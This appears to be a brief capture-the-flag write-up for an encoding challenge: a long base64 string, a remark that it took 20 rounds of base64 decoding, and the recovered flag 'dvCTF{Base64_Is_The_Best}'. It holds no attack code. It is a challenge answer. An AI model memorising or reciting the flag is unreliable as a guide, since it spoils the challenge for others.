KRmVsRllaRmhpUmxwb1dWUktSMWRHU2xsYVIzQlRWak5vV1ZkWGVHOVJNVkpIVlc1S1dHSkZjSE5WYlRGVFpXeHNWbGRzVG1oU1ZFWjZWVEkxYjFZeFdqWlNWRUpoVWtWYWNsVnFTa3RUVmxKMFlVWk9hR1ZzV2paV01XUXdXVmRSZVZaclpGZFhSM2h5Vld0V1MxZEdVbGRYYm1Sc1ZteHNOVnBWYUd0WFIwcEhZMFpvV2sxSGFFeFdNbmhoVjBaV2NscEhSbGROTW1oSlYxUkplRk14U1hsU2EyUm9VbXhLVkZac2FFTlRNVnAwVFZSQ1ZrMVZNVFJXYkdodlYwWmtTR0ZHYkZwaVdHaG9WbTE0YzJOc2NFaFBWM0JUWWtoQ05GWnJZM2RPVmxsNFYyNU9hbEpYYUZsV2ExVXhaR3hzVjFaWWFGaFNiRnA1V1ZWYWExUnRSbk5YYkZaWFlUSlJNRmRXV2t0ak1WSjFWRzFvVTJKR2NGbFdSbEpMWWpGT1YxZHJhR3hTTUZwaFZtMHhVMU5XV25Sa1J6bG9UVlZzTlZsVmFFTldiVXBJWVVWT1lWSkZXbkpXYWtaaFpFVTVWMVpyTlZkaWEwWXpWbXhqZDAxV1RYaFhhMmhVWWtkb2IxVnFRbUZXYkZwMFpVaGtUazFZUWxsYVZXaExZa1phVlZKc1pGaGhNWEJRV1ZaYVMyTnRUa1ZYYkdSb1RXczBNRmRZY0VkV2JWWlhWRzVXVkdKR1NuQldiRnAzVjFaYVIxbDZSbWxOVjFKSVYydGFhMWRIU2taalNFNVdZbFJHVkZwWGVITldiR1J6Vkcxb1YyRXpRWGhXVm1NeFlqRlplRmRZY0doVFJYQllWbXRXWVdWc1duRlNiR1JxVFZkU2VsbFZaSE5XTVZwMVVXcGFWMDFYVVhkWFZtUk9aREF4U1dGR2FGaFNNMmhRVm0xNGExVXhXWGhWYkdoclUwZFNWRlJXV2t0bGJHeFdZVWQwV0ZJd2NFaFpNRnB2VjJzeFNHRkZlRmROYm1ob1ZqQmFWMk5zY0VoU2JHUlhUVlZ3VWxac1VrTldhelZYVjFob2FsSlhhRzlWYWtwdlZERlZkMVpyZEU1aVJuQXdWRlpTUTFack1WWk5WRkpYVm0xb2VsWnRNVVpsVmxaelYyeHdhVmRHU1hwWFZsWmhWakpTU0ZacldtdFNNMEpVV1d0b1EwNUdXbkpaTTJSUFZtMVNTRll5TlU5aGJFcDBaVWRHVlZaV2NGZFVWbHB6VmpGYVdXRkdhRk5pUm5BMVYxWldZV0V4VW5SU2JrNVlZa1phV0ZsVVNsSk5SbFkyVW10MGFrMVlRa3BXYlhoVFlWWktjMk5HYkZoV00xSm9Xa1JCTVdNeFpISmhSM2hUVFVad2FGWnRNSGhWTVU1WFYyNVNhMUo2Ykc5VVZsWnpUbFpzVm1GRlRsZGlWWEJKV1ZWV1QxbFdTa1pYYmtwWFlXdGFhRnBGVlRWV01WcHlUbFprYVdFd1dYcFdiWGhxWkRBeFYxUllhRmhoTW1oVldXdGtiMkl4Vm5GUmJVWlhZa1p3TUZwVmFHdFVhekZZWlVaa1YwMXFWbkpXVkVwTFUxWkdjbUZHWkZOTk1taFZWbTF3UzFNeVRuTlVia3BxVW0xb2NGVnRlSGRsVm1SWlkwVmtWMkpXV2xoV1J6VlBZVlpLZFZGck9WVldla1oyVmpGYWExWXhWbkphUjNST1lURndTVlpxU2pSV01WVjVVMnRrYWxORk5WZFpiRkpIVmtaU1YxZHNXbXhXTURReVZXMTRiMVV5UlhwUmJVWlhWbTFOZUZscVJscGxSbVJaWTBkb1ZGSllRbGRYVmxKTFZURk9SMVp1UmxOaVZWcFpWbTAxUTFOV2JGWlhhemxYVFZad1NGWXllR0ZXTWtwSVZHcFNWV0V5VWxOYVZscGhZMnh3UjFwR2FGTk5NbWcxVm14a2QxRXhiRmhVYTJSWFlteEtjMVV3WkZOak1XeHlWMnhrVDFadVFsZFpWV1F3VjBaSmQyTkZhRnBOUm5CMlZqSnplRk5IUmtabFJtUk9ZbTFvYjFacVFtRldNazV6WTBWb1UySkhVbGhVVmxaM1ZXeGFjMVZyWkdoTlZURTBWVEZvYjJGc1NsaFZiV2hXWWxoTmVGWXdXbHBrTVZweVpFVTFhVkp1UVhkV1JscFRVVEZhY2sxV1drNVdSa3BZVm0weGIyVnNXblJOVlZwc1ZteGFlbFp0ZUhkaFZtUkhVMWh3V0ZZelFraFdha3BQVmpGU2RWVnNRbGRpVmtwVlYxZDRiMkl3TlZkWGJsSk9Va1ZhYjFSV1duTk9SbGw1VGxVNWFHSkZjRWRWTWpGdlZqSktTRlZyT1ZWV2JIQm9WakJrVG1WdFJrZGhSazVwVW01Qk1sWXhXbGRaVjBWNFZXNU9XRmRIZUc5VmExWjNWMFpTVjFkdVpHaFNiRmt5VlcxMGQySkdTbk5UYWtaWFVucEdTRlpVU2t0U01rNUhZa1pvVjAweFNtOVhhMUpDVFZkTmVGcElTbUZTYkhCdlZGZDRTMWRHV2tkYVNIQnNVbFJXV0ZadE5WTmhNVWwzVjJ4a1ZtSllhSHBVYkZwelZtMUdSbFJzWkdsV1dFSktWMVpXVjFVeFdsaFRiR3hvVTBWd1dGbHJXbmRUUm5CR1YydDBhMUl3TlVkVWJGcHJWR3hhV0dRemNGZGlXR2hVVlhwQmVGTkdTbGxoUjBaVFZqSm9WbGRYZEd0aU1rbDRWbTVTVGxaNmJGaFphMXAzWld4WmVVNVhkRlZoZWtaWVdUQm9jMVl3TVhGU2EyaGFWak5vYUZreU1VOVNWa1owVW14T1YwMVZXWHBXYlhoVFV6RktkRlp1VGxOaVIzaG9WVzB4YjJOR1ZuUmxTR1JwVFZkU1dGWlhkREJWTURGWFlrUlNXR0V5YUZoV2EyUkxWMGRXU1ZSc2NGZFNWbTk2Vm1wR1lXRXhXWGhqUlZaU1lsaFNjRlp0ZEZwTlJscHhVMnBTVjAxV1ZqVlZiR2h2WVd4T1JrNVdaRnBpUmtwSVZtdGFkMWRIVmtsVWJHUnBVakZLTmxaclkzaGlNVlY0VjJ0YVdHRnNjRmhXYTFaeVpVWnNWVkpzY0d4U2JWSmFXVEJhWVdGV1dYbGhSbWhZWWtkUmQxZFdXbk5XTWs1SFYyeG9hVkl4U25oV1JtUXdXVlpKZUZWWWFGaGlXRkp3VldwQ2QxZHNiRlpWYlVaWFRVUkdXVlpXYUd0WFJscDBWV3hPWVZac2NHaFpNbmgzVWpGd1IyRkdUazVOYldjeFZtMTRhMDFHV1hoVVdHaGhVbGRTV0ZsdGVFdGpiRlYzV2taT2FrMVhlSGxXTW5oclZERmFkVkZzWkZwV1YxRjNWakJhU21ReVRrWmhSbkJPVW01Q01sWnFTbnBsUms1SFZtNVdXR0pIVWs5WmJURnZZakZhY1ZGdFJsZE5helY2V1RCV2IxVXlTa2hWYkdoVlZteGFNMVpYZUdGak1YQkpXa1pTVGxaVVJUQldWRVp2WXpGVmVWSlliR2hTZW14WFdXdGFTMWRHV1hkWGJrNXJVakZLUjFwRlZURmhWa3AxVVZoa1YxSnNjRlJWVkVaaFkyc3hWMWRyTlZkU2EzQlpWbTAxZDFZeFdrZFhia1pVWVRGd2MxWnRlR0ZOUm14V1YyMUdWV0pGY0RGVlZ6QTFWakpLVlZKVVFscGxhM0JRV1hwR2QxTldWbk5VYld4WVVsVndWbFl4WkRCaU1VVjNUbFZrV0dKcmNHRlVWRXBUVlVaYWRHVklUazlTYkd3MVZHeFZOV0ZIU2taalJteGFWbFp3ZGxac1dtRk9iRnAxVjJ4d1RtSnRhRFpXYlhoaFVqRmtXRkpyWkdoU2F6VndWVzB3TlU1R1dYaFZhMDVhVmpCV05GWlhOVTlYUm1SSVpVYzVWbUV4V2pOV01GcHpWMGRTUm1SSGNHbFNiR3Q1VmxjeE1FMUhSblJTYWxwWFlrZG9XVmxVUm5kaFJteFhWMnQwYWsxck5VaFphMXB2VmpBd2VGTnRPVmRoYTNBMldsVmFTbVZHY0VsVGJXaFRUVEZLVlZaR1ZtRmtNV1JYVjJ0a1lWTklRbk5WYkZKWFYwWmFkRTVXVG1oTlZXOHlXV3RhYTFadFNsbGhSRTVWVmxad2FGWXdWVEZXYkZKeldrVTFhRTB3U2t0V01WcFhWakZWZUZkc2FGUmhNbEp4VldwS2IxWXhVbFphUms1WVVteFdNMVl5ZERCaGF6RllWVzVzVldKR2NISlpWbHByVTBaU2NWVnNaR2xYUjJoNVZrZDBhMU50VmxkVmJHeG9VbTFvY0ZsWWNGZFhiR1JYVld0a2EwMVdjRmhaYTJoTFdWWktObUpHYkZaaVZFVXdWakZhY21WdFRrWmFSMmhPWVROQ1NsZHNWbUZoTVZsM1RWaEdVMkV5YUdGV2FrNXZZVVpyZVUxVk9WUldNRFZJV1ZWa2IxUnNaRVpUV0d4WFlsUkdNMVY2Ums1bFZsSjFWR3hXYVdFelFuZFdWekI0VlRGa1IySklUbGhoTVhCeVZGWmFjMDVHV1hsTlZXUllVakJ3V0ZZeWRHOVdNVW8yVm10NFYwMUhVa3hWYlhNeFZqSkdSMWR0YkZOaWEwcFpWbXRrTkZKck9WZFJiRXBSVmtSQk9RPT0=
20 base64 decode iterations
dvCTF{Base64_Is_The_Best}
That was all that could handle myself for the amount of time. Thanks for reading!